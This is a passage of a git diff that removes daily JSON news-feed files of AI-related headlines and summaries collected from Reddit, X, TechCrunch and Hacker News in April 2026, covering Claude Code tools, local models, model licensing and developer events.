hosted agents at scale.\n\nin the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev", - "category": "ai_tools" - }, - { - "title": "@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30", - "url": "https://x.com/ArtificialAnlys/status/2042457674441482736", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T05:16:11.374Z", - "summary": "HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance.", - "category": "ai_tools" - }, - { - "title": "Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions", - "url": "https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.78, - "date": "2026-04-09T22:19:44.000Z", - "summary": "If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone.\n\nI built a system that fixes this. It's called Memoriki - a template that combines two open source projects:\n\n**Layer 1: LLM Wiki (Karpathy's pattern)**\n\nYou drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w", - "category": "ai_tools" - }, - { - "title": "I no longer need a cloud LLM to do quick web research", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-10T06:51:35.000Z", - "summary": "This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally.\n\nI use Qwen3.5:27B-Q3\\_K\\_M on an RTX 4090 with a context length of \\~200,000. I get \\~40 tk/s and use about 22gb VRAM.\n\nI use it through the llama.cpp Web UI, with MCP tools enabled. Here are the tools I have provided it for web search/scrape:\n\n \"\"\"\n webmcp - MC", - "category": "ai_models" - }, - { - "title": "Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT", - "url": "https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T06:00:22.605Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale", - "url": "https://x.com/ainativedev/status/2031797311790260394", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:13.355Z", - "summary": "AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale.", - "category": "ai_tools" - }, - { - "title": "@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For", - "url": "https://x.com/hugobowne/status/2042464629214101663", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:12.382Z", - "summary": "Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand.", - "category": "ai_tools" - }, - { - "title": "@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI", - "url": "https://x.com/InfluxDB/status/2042388369674469612", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-10T05:16:10.444Z", - "summary": "InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine.", - "category": "ai_tools" - }, - { - "title": "@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy", - "url": "https://x.com/Techmeme/status/2042465278462955882", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-10T05:16:08.371Z", - "summary": "Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance.", - "category": "ai_tools" - }, - { - "title": "@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare", - "url": "https://x.com/Berci/status/2042464294432858357", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:08.371Z", - "summary": "China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally.", - "category": "ai_tools" - }, - { - "title": "96GB Vram. What to run in 2026?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T05:07:43.000Z", - "summary": "I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? ", - "category": "ai_models" - }, - { - "title": "making my own ai waifu app that can teach me any language.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-10T03:32:15.000Z", - "summary": "using gemma-4-E4B-it for the llm \nher voice is using omnivoice tts that i made the api using fastapi\n\n3d model made by me using vroid studio \nright now is support uploading image, search web, and using voice call and video call like grok ani.\n\ni'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model.", - "category": "ai_models" - }, - { - "title": "Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T03:16:52.000Z", - "summary": "I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense.\n\n# The core Idea is :\n\nInstead of relying on a small model (\\~2B params) to generate code from scratch (which is usually weak), the agent would\n\n1. search GitHub for relevant code\n\n2. use that as a reference\n\n3. copy + adapt existing implementations\n\n4. generate minimal edits instead of full solutions\n\nSo the model acts mo", - "category": "ai_models" - }, - { - "title": "is Agentic Commerce just the next buzzword for let’s automate your bank account?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T02:32:35.000Z", - "summary": "Just saw this TechNode article claiming \"AI agents\" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline.\n\nWe can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have \"agents\" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare.\n\nThink about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp", - "category": "ai_models" - }, - { - "title": "Started a video series on building an orchestration layer for LLM post-training [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-10T00:24:33.000Z", - "summary": "Hi everyone!\n\nContext, motivation, a lot of yapping, feel free to skip to TL;DR.\n\nA while back I posted here asking [\\[D\\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. \n\nAt first I wasn't trying to build anything new. I mostly wanted to understand veRL p", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-11.json b/data/news-feed-2026-04-11.json deleted file mode 100644 index 371c3b4..0000000 --- a/data/news-feed-2026-04-11.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.705Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-11", - "article_count": 15, - "archived_story_count": 346, - "articles": [ - { - "title": "How I made my Claude multimodal — now I just feed it videos", - "url": "https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-11T15:49:48.000Z", - "summary": "Claude + Qwen API\n\nFigured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action.\n\nNow I just drop a video straight into Claude and get back what I need.\n\nPackaged it as a plugin for easy setup.\n\ngithub.com/kirillbrsnkv/give-claude-eyes", - "category": "ai_tools" - }, - { - "title": "How to get Claude to run more autonomously", - "url": "https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T11:38:26.000Z", - "summary": "Hi! Can someone tell me how to get Claude to work more autonomously on a large task?\n\nA bit of context: \nI have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings.\n\nThe application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently.\n\nSuper tedious for a human ", - "category": "ai_tools" - }, - { - "title": "update on my ai waifu app, can use web search react to images even picture of herself", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-11T11:19:52.000Z", - "summary": "using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances)\n\nusing SerpApi for the web search\n\nthe tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api)\n\nmy ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag", - "category": "ai_models" - }, - { - "title": "I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki", - "url": "https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T08:42:01.000Z", - "summary": "If you run multiple agent CLIs daily, you've probably hit the same pain points I have:\n\n1. Too many terminal windows — impossible to find the one you need\n2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse\n3. Sharing files between agents means manually copying everything into the project folder\n\nI looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b", - "category": "ai_tools" - }, - { - "title": "I automated most of my job", - "url": "https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-10T14:03:08.000Z", - "summary": "I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app.\n\nThe workflow is super simple:\n\n1. dotnet app calls our gitlab api for issues assigned to me\n\n2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description\n\n3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a", - "category": "ai_tools" - }, - { - "title": "I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it", - "url": "https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-04-11T08:37:14.000Z", - "summary": "Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago.\n\nSo I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project.\n\nWhat it does fo", - "category": "ai_tools" - }, - { - "title": "I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out", - "url": "https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.96, - "date": "2026-04-11T09:58:19.000Z", - "summary": " \nBuilt with Claude Code, specifically for Claude Code users. Free, open source, MIT. \n \nWhat it does \n \nu/daik0z/claude-notify adds a Stop hook to \\~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: \"3 files edited · 2 commands \n\". \n \nnpm install -g u/daik0z/claude-notify \nclaude-notify setup \n \nWhat I learned from 374 downloads \n \nI sat down to stress-test it and foun", - "category": "ai_tools" - }, - { - "title": "ComfyUI workflow to fully python script?", - "url": "https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-11T23:25:36.000Z", - "summary": "Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python.\n\nWhy?\nI'm planning to use a multi-GPU server and I want to optimize for that.\n\nWhat libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this?\n\nAlso, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those?\n\nThank you!", - "category": "creative_tools" - }, - { - "title": "Labs for Claude Certified Architect Foundations Exam", - "url": "https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T17:28:37.000Z", - "summary": "While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers.\n\n* Lab 01 - Customer Support Resolution Agent\n* Lab 02 - Code Generation Workflows\n* Lab 03 - Multi-Agent Research System\n* Lab 04 - Developer Productivity Agent\n* Lab 05 - CI/CD Integration\n* Lab 06 - Structured Data Extraction\n\n[https://github.", - "category": "ai_tools" - }, - { - "title": "FT - China’s Alibaba shifts towards revenue over open-source AI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-11T17:23:20.000Z", - "summary": "[https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t)\n\n \nIs it true?", - "category": "ai_models" - }, - { - "title": "FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/", - "source": "Reddit r/MachineLearning", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T15:33:13.000Z", - "summary": "I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch.\n\nThe main goal is to make the progression across versions easier to understand from code.\n\nThis is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details.\n", - "category": "ai_research" - }, - { - "title": "I built a structured reasoning framework for Claude — because \"good output\" isn't enough", - "url": "https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-11T14:46:51.000Z", - "summary": "**I built a structured reasoning framework for Claude — because \"good output\" isn't enough**\n\nI kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up.\n\nSo I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled.\n\nThe core idea:\n\n* Every complex task goes through a f", - "category": "ai_tools" - }, - { - "title": "Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-11T13:06:26.000Z", - "summary": "Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples.\n\nHuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal\nGitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/\nMIT licensed.\n\nThe repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and", - "category": "ai_models" - }, - { - "title": "Gemma 4 - Going Mad - - - Help!!!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T12:52:14.000Z", - "summary": "Hi All\n\nIm getting up to speed on LLMs and we are looking at Gemma4. \nWe are using a M3 Ultra with 512GB VRAM. So no dangers there.\n\nIm using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling.\n\nI have re-downloaded all the models this morning post the fixes. These are the unsloth ones. \n\nIm running llama.cpp - which i build on the server and is bang up to date.\n\nSo in opencode CLI - if i give it this prompt - its runs", - "category": "ai_models" - }, - { - "title": "Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T11:22:38.000Z", - "summary": "I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff.\n\nTried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists.\n\nIt includes:\n\n• local models (Ollama, Qwen, Llama etc) \n• free LLM APIs (OpenRouter, Groq, Gemini etc) \n• coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) \n• RAG stack tools (vector DBs, embeddings, frameworks) \n• agent frameworks and automati", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-12.json b/data/news-feed-2026-04-12.json deleted file mode 100644 index e265916..0000000 --- a/data/news-feed-2026-04-12.json +++ /dev/null @@ -1,168 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.848Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-12", - "article_count": 10, - "archived_story_count": 109, - "articles": [ - { - "title": "JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-12T04:34:19.000Z", - "summary": "One instance is enough, but where is the fun in that right? 🤣\n\nJARVIS across 3 servers, each running a different AI coding agent:\n\n\\- Hel2: Claude Code CLI\n\n\\- Hel1: Cursor CLI\n\n\\- Mainframe: OpenCode \n\nThey talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. \n\nSame JARVIS, different hands. They don't just run. They coordinate.\n\nVideo is all 3 tmux sessions open at o", - "category": "ai_tools" - }, - { - "title": "Openclaw real costs: self hosting vs managed hosting vs API fees", - "url": "https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-12T06:27:27.000Z", - "summary": "Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth?", - "category": "ai_tools" - }, - { - "title": "OK I installed bitsandbytes but still getting error - Help please - thanks", - "url": "https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-12T01:55:27.000Z", - "summary": "Used terminal and installed it like so:\n\npip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\\_main/bitsandbytes-1.33.7.preview-py3-none-win\\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl)\n\n \nGetting error and StableDiffusion does not run\n\nFile \"C:\\\\Users\\\\123\\\\Downloads\\\\StabilityMatrix-win-x64\\\\Data\\\\Packages\\\\", - "category": "creative_tools" - }, - { - "title": "Meta released new paper : Neural Computers", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-12T06:54:27.000Z", - "summary": "What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\\_jA?si=0h0bnM7qUsqDcKCJ\n\npaper : https://arxiv.org/abs/2604.06425", - "category": "ai_models" - }, - { - "title": "Open source agent stack that actually works in 2026 (no hype)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-12T06:16:49.000Z", - "summary": "been running this setup for a few months and wanted to share what actually works vs whats just github stars\n\nhermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences\n\neverything c", - "category": "ai_models" - }, - { - "title": "MiniMax M2.7 is NOT open source - DOA License :(", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-12T02:55:38.000Z", - "summary": "Commercial use is banned without prior written permission from MiniMax.\n\nAnd their definition of \"commercial\" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting.\n\nSo you can't use the model or any outputs for anything commercial!\n\nI'm really starting to hate these \"open weights, closed license\" models...\n\nhttps://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE", - "category": "ai_models" - }, - { - "title": "Does LTX 2.3 have good motion transfer?", - "url": "https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9400000000000001, - "date": "2026-04-12T07:50:22.000Z", - "summary": "What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one?\n\n", - "category": "creative_tools" - }, - { - "title": "This is so good", - "url": "https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-04-12T03:35:24.000Z", - "summary": "Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. ", - "category": "ai_tools" - }, - { - "title": "It seems ChatGPT leaked a JSON response (including API enpoint)", - "url": "https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-04-11T23:52:55.000Z", - "summary": "idk if this is visible in network requests, but chatgpt responded with \\[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\\\n \"error\": {\\\\n \"message\": \"You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.\",\\\\n \"type\": \"images\",\\\\n \"param\": nul", - "category": "ai_tools" - }, - { - "title": "MiniMax M2.7 Is Now Open Source", - "url": "https://firethering.com/minimax-m2-7-agentic-model/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.74, - "date": "2026-04-12T10:07:33.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-14.json b/data/news-feed-2026-04-14.json deleted file mode 100644 index 363235b..0000000 --- a/data/news-feed-2026-04-14.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.094Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-14", - "article_count": 15, - "archived_story_count": 271, - "articles": [ - { - "title": "hands on workshop: context engineering for multi agent systems [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-13T15:56:23.000Z", - "summary": "hey everyone, sharing this because it's directly relevant to what a lot of people here are building.\n\npackt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman.\n\nwhat gets covered:\n\n\\- semantic blueprints for multi agent orchestration\n\n\\- MCP integration for standardized agent tool use\n\n\\- context window management across agents\n\n\\- high fidelity RAG pipelines with verifiable citations\n\n\\- safeguards against prompt injection and", - "category": "ai_research" - }, - { - "title": "Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)", - "url": "https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-14T20:58:35.000Z", - "summary": "I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware)\n\nWe recently added Docker Sandbox support and I wanted to share it here.\n\nThe idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal.\n\n`npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje", - "category": "ai_tools" - }, - { - "title": "How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source", - "url": 